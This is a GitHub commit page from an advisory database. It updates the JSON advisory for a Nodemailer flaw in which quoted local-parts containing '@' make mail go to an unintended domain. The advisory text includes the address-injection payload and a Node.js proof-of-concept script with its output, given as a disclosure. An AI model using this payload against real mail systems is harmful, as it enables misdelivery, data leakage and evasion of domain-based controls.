Skip to content

Commit 2ecc257

Browse files
advisory-database[bot]advisory-database[bot]
committed
1 parent 4968525 commit 2ecc257

File tree

1 file changed

+16
-2
lines changed

1 file changed

+16
-2
lines changed

advisories/github-reviewed/2025/10/GHSA-mm7p-fcc7-pg87/GHSA-mm7p-fcc7-pg87.json

Lines changed: 16 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-mm7p-fcc7-pg87",
4-
"modified": "2025-10-07T13:42:02Z",
4+
"modified": "2025-11-17T17:29:26Z",
55
"published": "2025-10-07T13:42:02Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2025-13033"
8+
],
79
"summary": "Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict",
810
"details": "The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.\n\nPayload: `\"[email protected] x\"@internal.domain`\nUsing the following code to send mail\n```\nconst nodemailer = require(\"nodemailer\");\n\nlet transporter = nodemailer.createTransport({\n service: \"gmail\",\n auth: {\n user: \"\",\n pass: \"\",\n },\n});\n\nlet mailOptions = {\n from: '\"Test Sender\" <[email protected]>', \n to: \"\\\"[email protected] x\\\"@internal.domain\",\n subject: \"Hello from Nodemailer\",\n text: \"This is a test email sent using Gmail SMTP and Nodemailer!\",\n};\n\ntransporter.sendMail(mailOptions, (error, info) => {\n if (error) {\n return console.log(\"Error: \", error);\n }\n console.log(\"Message sent: %s\", info.messageId);\n\n});\n\n\n(async () => {\n const parser = await import(\"@sparser/email-address-parser\");\n const { EmailAddress, ParsingOptions } = parser.default;\n const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);\n\n if (!parsed) {\n console.error(\"Invalid email address:\", mailOptions.to);\n return;\n }\n\n console.log(\"Parsed email:\", {\n address: `${parsed.localPart}@${parsed.domain}`,\n local: parsed.localPart,\n domain: parsed.domain,\n });\n})();\n```\n\nRunning the script and seeing how this mail is parsed according to RFC\n\n```\nParsed email: {\n address: '\"[email protected] x\"@internal.domain',\n local: '\"[email protected] x\"',\n domain: 'internal.domain'\n}\n```\n\nBut the email is sent to `[email protected]`\n\n<img width=\"2128\" height=\"439\" alt=\"Image\" src=\"https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d\" />\n\n\n### Impact:\n\n- Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.\n\n- Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.\n\n- Potential compliance issue: Violates RFC 5321/5322 parsing rules.\n\n- Domain based access control bypass in downstream applications using your library to send mails\n\n### Recommendations\n\n- Fix parser to correctly treat quoted local-parts per RFC 5321/5322.\n\n- Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.",
911
"severity": [
@@ -38,10 +40,22 @@
3840
"type": "WEB",
3941
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
4042
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
46+
},
4147
{
4248
"type": "WEB",
4349
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
4450
},
51+
{
52+
"type": "WEB",
53+
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
58+
},
4559
{
4660
"type": "PACKAGE",
4761
"url": "https://github.com/nodemailer/nodemailer"

0 commit comments

Comments
 (0)